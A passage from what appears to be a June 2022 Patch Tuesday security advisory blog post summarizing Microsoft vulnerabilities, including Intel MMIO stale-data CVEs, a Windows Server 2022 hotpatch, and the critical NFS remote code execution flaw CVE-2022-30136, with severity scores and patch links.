In non-browsing scenarios on standalone systems, an attacker would need prior access to the system or an ability to run a specially crafted application on the target system to leverage these vulnerabilities.\n\nThese vulnerabilities are known as:\n\n * [CVE-2022-21123](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21123>) | Shared Buffer Data Read (SBDR) \n * [CVE-2022-21125](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21125>) | Shared Buffer Data Sampling (SBDS)\n * [CVE-2022-21127](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21127>) | Special Register Buffer Data Sampling Update (SRBDS Update)\n * [CVE-2022-21166](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21166>) | Device Register Partial Write (DRPW)\n\n**Important**: These vulnerabilities might affect other operating systems and service providers. We advise customers to seek guidance from their respective vendors.\n\n [Related Threat Protection Post](<https://threatprotect.qualys.com/2022/06/15/microsoft-releases-patches-for-the-intel-processor-mmio-stale-data-vulnerabilities-in-june-2022-patch-tuesday/>)\n\n* * *\n\n### Windows Server 2022 Azure Edition Core Hotpatch ([KB5014677](<https://support.microsoft.com/en-us/topic/june-14-2022-kb5014677-os-build-20348-770-a7a0d557-bd34-4867-bf6f-a47fbc997810>)) **OS Build 20348.770**\n\nWindows Server 2022 Azure Edition Core Hotpatch ([KB5014677](<https://support.microsoft.com/en-us/topic/june-14-2022-kb5014677-os-build-20348-770-a7a0d557-bd34-4867-bf6f-a47fbc997810>)) addresses 22 unique vulnerabilities, ranging in severity from a CVSSv3.1 score of 5.3/10 to 8.8/10, as summarized below.\n\n\n\n* * *\n\n# **Microsoft Critical and Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jun>) covers multiple Microsoft product families, including Azure, Developer Tools, Edge-Chromium Browser, Microsoft Office, SQL Server, 
System Center, and Windows.\n\nA total of 25 unique Microsoft products/versions are affected.\n\nDownloads include Azure Hotpatch, Cumulative Updates, Monthly Rollup, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>) | Windows Network File System Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nThis vulnerability could be exploited over the network by making an unauthenticated, specially crafted call to a Network File System (NFS) service to trigger a Remote Code Execution (RCE).\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely._**\n\n* * *\n\n### [CV